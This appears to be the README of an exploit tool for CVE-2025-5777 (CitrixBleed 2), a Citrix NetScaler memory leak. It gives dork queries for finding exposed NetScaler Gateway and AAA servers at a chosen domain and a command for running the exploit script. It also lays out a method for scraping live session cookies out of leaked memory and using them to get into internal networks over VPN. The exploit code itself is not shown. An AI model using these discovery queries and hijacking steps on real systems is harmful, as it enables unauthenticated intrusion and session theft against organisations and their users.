Exploit for CVE-2025-5777: Citrix NetScaler Memory Disclosure (CitrixBleed 2) [T1606]

Description

• External, unauthenticated exploit for memory leak in Citrix NetScaler Gateway & AAA Virtual Server
• Leverages insufficient input validation in the web app to fire the payload, and TOCTOU Race Conditions to scrape variables in memory

Asset Discovery & Exposure Analysis - (Red/Purple Team -> Organization)

Method 1: Search Engine Dorking

site:<targetDomainSuffix> intitle:"Netscaler AAA" | intitle:"Citrix Gateway"

Method 2: Hunter.how

domain.suffix=="<targetDomainSuffix>" and header.server="snow_adc"

Exploit Usage

bash CVE-2025-5777.sh <targetDomain>

Pivoting - Red Team Operations

Objective - Pivot externally without credentials -> internal with low priv user credentials over VPN

Methodology

• Inspect response bodies and experiment with decoding and escaping to gain visibility on the asset - log files, etc.
• Inspect response headers, repeat til capture of active user session cookies in memory - Demonstration by horizon3.ai
• Authenticate to the target domain

References

• CVEdetails.com
• Tenable Plugins
• Attack Vector: CAPEC-29 - Leveraging Time-of-Check and Time-of-Use (TOCTOU) Race Conditions
• Adversary Emulation: T1606 - Forge Web Credentials
• EUVD-2025-18497
• Horizon3.ai - CitrixBleed 2 Exploit Deep Dive